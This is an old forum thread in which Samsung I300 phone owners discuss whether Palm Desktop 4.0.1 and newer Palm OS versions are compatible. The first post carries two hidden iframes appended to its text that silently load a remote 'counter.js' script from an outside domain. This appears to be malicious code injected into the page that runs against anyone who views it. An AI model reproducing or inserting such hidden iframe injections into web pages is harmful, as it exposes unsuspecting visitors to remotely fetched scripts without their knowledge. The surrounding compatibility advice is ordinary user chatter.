+ Reply to Thread
Results 1 to 10 of 10
  1. #1
    Registered User
    Join Date
    12-20-2001
    Location
    Dallas, Texas
    Posts
    28

    Can I UpGrade to Palm Desktop 4.0.1?

    Hello All,

    Does anyone know if Palm Desktop 4.01 is compatible with the I300? I am downloading the program now and don't want to use it if it is not compatible. I am new to the Palm Operating system so please forgive my ignorance?? Thanks..<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    EMR

  2. #2
    Registered User
    Join Date
    11-23-2001
    Posts
    1
    Yes. 4.0.1 works just fine with the phone.

  3. #3
    Beams from above...
    Join Date
    12-24-2001
    Location
    Atlanta
    Posts
    26
    I just got my phone this morning, and it shipped with Palm Desktop 4.01.

    John

  4. #4
    Registered User
    Join Date
    12-26-2001
    Location
    Florida
    Posts
    31
    Eric did you ever upgrade your I300. I've seen posts on other boards saying don't do it. Anyone else done an upgrade? I can see where new units could be coming with 4.0.1 stuff while running an upgrade on the 3.5's blows up??

    ....sorry if this is a repeat question....

  5. #5
    Registered User
    Join Date
    12-20-2001
    Location
    Dallas, Texas
    Posts
    28
    Hello KDavis,

    I did upgrade to Palm Desktop 4.0.1. I did not upgrade the Palm OS system on my I300. I still have Palm OS software version 3.5.2 on the I300. So far Desktop 4.0.1 is working fine..no problems. But if I do have problems I will let you know.
    EMR

  6. #6
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    4.0.1 works without problem! get it! i have been using it since april when i got the 6035... does what it says...

  7. #7
    Registered User
    Join Date
    12-20-2001
    Location
    Dallas, Texas
    Posts
    28

    Is there a Later Version of Palm OS for The I300

    Hello All,

    Well I mentioned before that I have Palm OS 3.5.2 on the I300. Is there a later version of Palm OS that is compatible on the I300?
    EMR

  8. #8
    Registered User
    Join Date
    12-26-2001
    Location
    Florida
    Posts
    31
    Sorry guys, apparently my reading skills are in need of help....

    Agreed, the 4.0.1 desktop software works great!! I downloaded it so I could HotSync to my laptop via IR.

  9. #9
    Registered User
    Join Date
    12-26-2001
    Location
    Florida
    Posts
    31
    See link below to another board saying don't try the OS upgrade. My original post was asking this group if anyone tried the OS upgrade....my fault for starting the confusion.

    http://www.palmblvd.com/boards/samsu...essages/97.htm

  10. #10
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    if you mean 3.5.3 or 4.x, then NO they are not for this phone.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts